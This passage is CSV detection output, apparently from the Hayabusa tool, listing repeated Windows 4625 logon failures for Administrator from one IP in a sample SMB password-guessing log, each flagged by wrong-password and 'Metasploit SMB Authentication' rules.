Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 